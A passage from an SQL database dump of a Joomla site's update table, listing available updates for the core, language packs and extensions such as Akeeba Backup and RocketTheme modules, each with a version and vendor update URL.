Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4188,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4189,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4190,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4191,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4192,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4193,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4194,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4195,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4196,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4197,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4198,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4199,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4200,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4201,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4202,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4203,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4204,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(4205,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(4206,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(4207,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4208,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4209,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4210,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4211,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4212,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4213,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4214,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4215,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4216,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4217,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4218,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4219,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4220,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4221,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4222,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4223,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4224,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4225,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4226,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4227,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4228,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4229,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4230,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4231,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4232,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4233,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4234,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4235,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4236,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4237,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4238,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4239,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4240,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4241,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4242,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4243,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4244,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4245,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4246,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4247,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4248,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4249,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4250,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4251,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4252,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4253,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(4254,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(4255,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(4256,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4257,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4258,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4259,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4260,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4261,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4262,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4263,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4264,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4265,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4266,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4267,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4268,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4269,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4270,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4271,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4272,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4273,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4274,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4275,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4276,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4277,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4278,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4279,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4280,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4281,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4282,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4283,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4284,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4285,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4286,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4287,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4288,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4289,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4290,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4291,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4292,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4293,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4294,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4295,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4296,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4297,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4298,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4299,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4300,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4301,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4302,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4303,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4304,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4305,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4306,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4307,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4308,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(4309,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(4310,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(4311,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4312,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4313,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4314,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4315,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4316,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4317,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4318,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4319,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4320,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4321,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(4322,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(4323,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(4324,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(4325,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(4326,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(4327,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(4328,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(4329,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(4330,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(4331,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(4332,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(4333,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(4334,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(4335,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(4336,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(4337,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(4338,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(4339,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(4340,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(4341,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(4342,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(4343,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(4344,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(4345,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(4346,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(4347,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(4348,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(4349,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(4350,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(4351,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(4352,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(4353,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(4354,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(4355,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(4356,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4357,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(4358,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(4359,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(4360,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4361,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4362,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4363,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4364,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4365,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4366,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4367,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4368,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4369,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4370,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4371,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4372,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4373,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4374,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4375,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4376,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4377,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4378,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4379,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4380,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4381,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(4382,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4383,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4384,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(4385,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(4386,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(4387,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(4388,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(4389,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(4390,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(4391,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(4392,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(4393,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(4394,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(4395,3,0,'Chinese 